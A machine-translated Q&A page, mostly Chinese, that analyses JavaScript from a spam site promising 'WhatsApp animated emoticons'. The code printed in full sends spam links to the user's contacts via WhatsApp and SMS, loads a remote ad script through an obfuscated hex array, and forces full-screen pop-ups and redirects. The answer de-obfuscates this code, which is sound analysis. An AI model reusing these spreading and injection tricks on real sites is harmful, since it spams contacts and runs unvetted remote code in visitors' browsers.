恶意网站:解密代码

Malicious website: decyphering the code?

本文关键字：代码解密网站恶意更新时间：2023-09-26

因此，有一个恶意网站试图通过垃圾邮件进一步传播他们的网站，这也导致了广告-我建议启用noscript
http://trucchiios.com/emoticon/index_en.php
现在我有了当你按下whatsapp大按钮时执行的代码，但它能做什么？

c = 0;
var image;
function fn1(x)
{
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 6)
        {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 2) {
                ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
            } else if (c == 4) {
                ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
            }
        } else if (c <= 10) {
            window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
            if (c == 7) {
                ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
            }
            var head = document.getElementsByTagName('head').item(0);
            var _0xc631 = ["'x73'x63'x72'x69'x70'x74", "'x63'x72'x65'x61'x74'x65'x45'x6C'x65'x6D'x65'x6E'x74", "'x74'x79'x70'x65", "'x74'x65'x78'x74'x2F'x6A'x61'x76'x61'x73'x63'x72'x69'x70'x74", "'x73'x72'x63", "'x68'x74'x74'x70'x3A'x2F'x2F'x61'x64'x73'x2E'x73'x70'x72'x69'x6E'x74'x72'x61'x64'x65'x2E'x63'x6F'x6D'x2F'x61'x64'x73'x63'x72'x69'x70'x74'x2E'x70'x68'x70'x3F'x70'x69'x64'x3D'x38'x36'x37'x33'x26'x6F'x72'x64'x3D'x5B'x74'x69'x6D'x65'x73'x74'x61'x6D'x70'x5D", "'x61'x70'x70'x65'x6E'x64'x43'x68'x69'x6C'x64"];
            var script = document[_0xc631[1]](_0xc631[0]);
            script[_0xc631[2]] = _0xc631[3];
            script[_0xc631[4]] = _0xc631[5];
            head[_0xc631[6]](script);
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}
function fn3(x) {
    if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        // some code..
        ++c;
        if (c <= 10) {
            window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
        } else
            window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else {
        window.alert("Please invite via your mobile browser");
    }
}
function fn2(x) {
    if (c >= 10)
    {
        window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
    } else
    {
        window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited  " + c + " contacts.");
    }
}
var n = 300,
    t = setInterval(function() {
        $("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
    }, 1e3);

我只想有人告诉我它的作用。我怀疑这只是一个adspam，而不是真正的恶意软件，但请查看一下。

这段代码似乎是上周收到的垃圾邮件数量不断增加的原因。我很确定这个代码是发送一个链接到使用Whatsapp网络的恶意网站：

window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");

如果使用移动设备，

if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {

还尝试发送短信：

"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");

当执行此代码时，会加载其他一些插件站点。这段代码似乎可以执行其他一些任务，但很难知道。该脚本是使用Javascript编写的。

它添加了javascript文件：http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]。

完整代码：

var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]    
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);

"正常"代码：

var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);

网页.../adscript.php?pid=8673&ord=[timestamp]，使用缓存头只显示一次。在第一个视图中，您会得到：

 if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
 else{ document.asm_max_2398++; }
 var asm_ex = false;
 var asm_ex_all = false;
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
 for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
 if(asm_ex_all){}
 else if(!asm_ex  && document.asm_max_2398 <= 1)
 {
   document.write(''); 
(function ()
 {
  var s, r, t;
  r = false;
  s = document.createElement("script");
  s.type = "text/javascript";
  s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
  s.readySet = false;
  s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
  s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
  function asm_pop_asmfls8673x5396511y1447611443()
  {
   r = true;
   var asm_pop_options = new Object()
   asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
   asm_pop_options.breite = "1920";
   asm_pop_options.hoehe = "1080";
   asm_pop_options.links = "0";
   asm_pop_options.oben = "0";
   asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
   asm_pop_options.layeronly = false;
   asm_pop_options.popunder = false;
   asm_pop_options.canlayer = false;
   asm_pop_options.clickpop = true;
   asm_pop_options.close = "0";
   asm_pop_options.booLoad = true;
   asm_pop_options.loadTime = "2";
   asm_pop_options.closeTime = "0";
   asm_pop_options.cookdom = "sprintrade.com";
   asm_pop_options.poptitle = "";
   asm_pop_options.popdomain = "http://cdn.adspirit.de";
   asm_pop_options.kid = "2398";
   asm_pop_options.pid = "8673";
   asm_pop_options.id = "asmfls8673x5396511y1447611443";
   window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
  }
  var ss = document.getElementsByTagName("script");
  if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
  else if(document.body){document.body.appendChild(s);}
 })()
   document.write(''); 
 }
 else
 {
  document.write('<scr'+'ipt type="text'/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><'/scr'+'ipt>');
 }

获得后：

 document.write('');

脚本被设置为只运行一次。

语言是Javascript。

这些链接与mailto:链接（它调用电子邮件的默认应用程序）几乎相同，但在这种情况下，它调用默认的WhatsApp应用程序或SMS应用程序（取决于操作系统），然后发送广告。

（%0D%0A是CRLF的unescape编码字符串）

但话说回来，如果你说这是一个很大的"WhatsApp"按钮，你希望它能做什么？